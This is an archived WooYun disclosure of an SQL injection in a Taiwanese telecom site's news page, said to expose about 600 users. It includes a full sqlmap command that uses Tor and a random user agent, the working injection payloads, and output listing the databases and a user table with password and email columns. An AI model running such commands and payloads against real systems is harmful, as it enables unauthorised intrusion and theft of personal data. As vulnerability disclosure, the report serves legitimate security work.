乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
台湾大鳴電訊SQL注入(影响600用户信息)
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "**.**.**.**/news/index.php?mode=data&id=16" --dbs --is-dba --current-dbParameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: mode=data&id=16 RLIKE (SELECT (CASE WHEN (9151=9151) THEN 16 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: mode=data&id=16 AND (SELECT 5938 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(5938=5938,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)web server operating system: Windowsweb application technology: PHP 4.4.7, Apache 2.0.59back-end DBMS: MySQL 5.0current database: 'dmecom'current user is DBA: Falseavailable databases [2]:[*] dmecom[*] information_schemaDatabase: dmecom+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+<....>| imw_files_link | 617 || imw_users | 599 || imw_epapers_subscriber | 440 || imw_products_content | 432 |<......>Database: dmecomTable: imw_users[27 columns]+------------------------+-------------------+| Column | Type |+------------------------+-------------------+| address | varchar(255) | ==>地址| area | varchar(255) || authority | text || birthday | varchar(10) || career | varchar(255) || company_name | varchar(255) || date_end | varchar(10) || date_start | varchar(10) || educational_background | varchar(255) || email | varchar(255) | ==>电邮| epaper_subscriber | enum('0','1') || fax | varchar(50) || id | int(10) || mobile | varchar(50) || name | varchar(100) || password | varchar(100) | ==>密码| professional_title | varchar(255) || sex | enum('0','1') || sno | varchar(255) || status | enum('0','1','2') || tel_1 | varchar(50) || tel_2 | varchar(50) || time_create | varchar(19) || time_modify | varchar(19) || type_id | int(10) || username | varchar(100) || zip | varchar(10) |+------------------------+-------------------+
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-14 16:32
感謝通報
暂无